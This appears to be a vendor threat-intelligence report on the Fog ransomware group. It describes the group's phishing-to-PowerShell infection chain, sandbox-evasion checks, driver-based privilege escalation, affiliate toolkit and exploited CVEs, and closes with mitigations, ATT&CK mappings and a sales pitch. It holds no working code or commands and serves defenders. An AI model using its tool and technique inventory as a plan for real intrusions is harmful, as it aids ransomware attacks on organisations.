The Fog ransomware group is one of the fastest-growing cybercrime actors, gaining attention for its multi-stage infection chain, broad targeting range, and reliance on affiliates.
Last observed in March 2025, the group left behind a complex operational footprint that indicates both technical maturity and organized collaboration across multiple campaigns.
Although their public-facing activity has ceased, the group’s tactics and toolsets continue to inform investigations into affiliated ransomware operators and potential successor entities.
Initial Access and Multi-Stage Delivery Chain
Fog campaigns relied heavily on phishing as the primary means of entry. The group distributed emails containing an archive titled “Pay Adjustment.zip”, which included an LNK shortcut disguised to resemble a PDF document. When executed, this shortcut initiated a download sequence that retrieved stage1.ps1, a PowerShell script responsible for triggering the remaining infection stages.
This script functioned as the centerpiece of the operation. It downloaded additional payloads, including a ransomware loader named cwiper.exe and a privilege-escalation utility known as ktool.exe, and fetched secondary scripts used for reconnaissance and data exfiltration. The same PowerShell command embedded in the script also appeared within the deobfuscated ransom-note text, suggesting that the group relied on multiple vectors that all funneled back to the same staging mechanism.
Beyond its technical role, stage1.ps1, the primary bootstrapper, contains nonstandard content for ransomware operations: political commentary and commands to open political YouTube videos. This mix of functionality and messaging made Fog campaigns unusual compared to more commercially driven ransomware groups.
Payload Structure and Anti-Analysis Behavior
Fog’s payload ecosystem comprises several distinct components. Scripts such as Lootsubmit.ps1 and Trackerjacker.ps1 gathered system metadata, network details, and geolocation information, sometimes through external services like the Wigle API, before sending the results to a remote receiver. The ransom workflow was linked to a Monero payment address, often embedded in a QR code dropped on infected machines.
Privilege escalation attempts were facilitated through ktool.exe, which deployed a vulnerable Intel driver (iQVW64.sys) to exploit a known flaw. Meanwhile, the ransomware loader embedded an encrypted Fog binary, decrypting it at runtime using a key unique to each variant. To complicate analysis, the loader performed several environmental checks, CPU count, memory size, MAC prefixes, registry markers, and timing anomalies, and halted execution if sandbox indicators were detected.
During encryption, the malware generated dbgLog.sys, a log file, to record activity and deposited a ransom note named readme.txt. Some variants included intentionally provocative or sarcastic language, referencing fictional agencies such as the “Department of Government Efficiency.”
Affiliate Tools and Open Directory Exposure
The Fog ransomware holds a mature Ransomware-as-a-Service ecosystem. According to Cyble Vision’s data, among the items stored are:
- Sliver C2 frameworks
- SonicWall VPN credential scanners
- Credential dumps associated with stolen VPN access
- DonPAPI and Impacket tools for DPAPI theft and lateral movement
- Active Directory exploitation tools, including Certipy and Zer0dump
- Kerberos/PAC attack scripts associated with noPac and Pachine
- AnyDesk installers and automation scripts
- Utility tools such as Powercat and Proxychains
This extensive toolkit allows the Fog ransomware group to run full-scale intrusion operations, including reconnaissance, credential harvesting, persistence, and stealthy pivoting.
Exploited Vulnerabilities and Campaign Expansion
Fog operators exploited several notable vulnerabilities during their campaigns. These included:
- CVE-2024-40766, an access-control flaw affecting SonicWall SSL-VPN appliances
- CVE-2020-1472 (Zerologon) for domain-level compromise
- CVE-2021-42278 and CVE-2021-42287, used for Kerberos abuse
- CVE-2015-2291, leveraged through the vulnerable Intel Ethernet diagnostics driver
Additionally, between January and March 2025, Fog-associated actors targeted GitLab environments, exfiltrating source code, and releasing it incrementally to pressure victims. Shortly after these incidents, the group’s dedicated leak site went offline.
Global Footprint and Affected Sectors
Fog ransomware activity extended across a wide geographic range, affecting organizations in regions including Europe, Asia, Africa, and the Americas. Impacted countries include Austria, Australia, Belgium, Brazil, Canada, Germany, Egypt, Israel, India, Mexico, the Philippines, Turkey, the United States, Vietnam, and many others.
The targeting scope was equally broad. Documented victims span more than two dozen sectors, among them:
- Aerospace and defense
- Education
- Government and law enforcement
- Financial services
- Healthcare
- Manufacturing
- Media and entertainment
- Technology and telecommunications
- Retail
- Transportation and logistics
- Energy and utilities
- Pharmaceuticals and biotechnology
Victim Activity and Double-Extortion Operations
Fog operated under a double-extortion model, both encrypting data and stealing sensitive information to pressure victims with the threat of leaking publication. The group claimed more than 100 affected organizations.
One confirmed case involved Waverley Christian College in Australia, which reported a cyber incident in December 2024 after the group claimed theft of several gigabytes of data. Early Fog campaigns concentrated on U.S. schools and recreation centers in mid-2024, but later activity expanded to include financial and commercial entities.
Conclusion
Although the Fog ransomware group has shown no confirmed activity since March 2025, its earlier campaigns highlight a technically capable operation that leveraged phishing-based delivery chains, staged PowerShell scripts, privilege-escalation exploits, and a broad affiliate toolkit.
Whether the group has dissolved or rebranded is still unclear, but its tactics continue to inform current investigations into new ransomware actors. For organizations monitoring similar threats, Cyble’s intelligence resources can support ongoing detection and analysis to strengthen visibility into ransomware activity. Start by requesting an external threat assessment report or scheduling a personalized demo today!
Recommendation and Mitigation Strategies
- Implement strict email security controls to block phishing attachments, especially LNK files disguised as documents, and deploy sandbox inspection for ZIP archives.
- Harden PowerShell usage by enforcing constrained language mode, script signing policies, and monitoring for suspicious execution patterns tied to multi-stage loaders.
- Patch exposed systems promptly, prioritizing vulnerabilities abused by Fog operators such as SonicWall SSL-VPN (CVE-2024-40766), Zerologon (CVE-2020-1472), and Active Directory privilege-escalation flaws (CVE-2021-42278/42287).
- Restrict the use of vulnerable or unsigned drivers and enable kernel-mode driver blocking to mitigate bring-your-own-vulnerable-driver (BYOVD) attacks like those using iQVW64.sys.
- Enforce MFA and monitor VPN access logs to detect misuse of stolen credentials and block anomalous authentication attempts.
- Deploy endpoint detection and response (EDR) with behavioral rules that can detect staged PowerShell chains, credential harvesting tools, and lateral movement frameworks.
- Segment networks and limit administrative privileges to reduce the impact of credential compromise and obstruct lateral movement via tools like Impacket, DonPAPI, and Kerberos/PAC exploitation kits.
MITRE ATT&CK Techniques Associated with the Fog Ransomware Group
- Valid Accounts (T1078): Fog operators used stolen or compromised SonicWall VPN credentials, identified in sonic_scan.zip, to authenticate into target environments and gain initial access.
- Exploit Public-Facing Application (T1190): Affiliates exploited vulnerabilities in exposed services, most notably the SonicWall SSL-VPN flaw CVE-2024-40766, or reused compromised VPN credentials to breach networks through internet-facing applications.
- Spearphishing Attachment (T1566.001): Campaigns delivered phishing emails containing the archive “Pay Adjustment.zip”, which held an LNK file masquerading as a PDF; opening it initiated Fog’s multi-stage PowerShell infection chain.
- PowerShell (T1059.001): The stage1.ps1 script served as the primary bootstrapper, downloading the ransomware loader (cwiper.exe), privilege-escalation tool (ktool.exe), and various secondary scripts used in later stages.
- Malicious File (T1204.002): The LNK file disguised as a PDF relied on user execution to trigger a command that downloaded stage1.ps1, enabling the broader multi-stage deployment process.
- Valid Accounts – Persistence (T1078): Fog operators maintain long–term access by repeatedly leveraging stolen SonicWall VPN credentials to reenter compromised networks.
- Windows Service (T1543.003): Persistence was reinforced through automated installation and configuration of AnyDesk, using a PowerShell script (any.ps1) that deployed the service and set up a default access password.
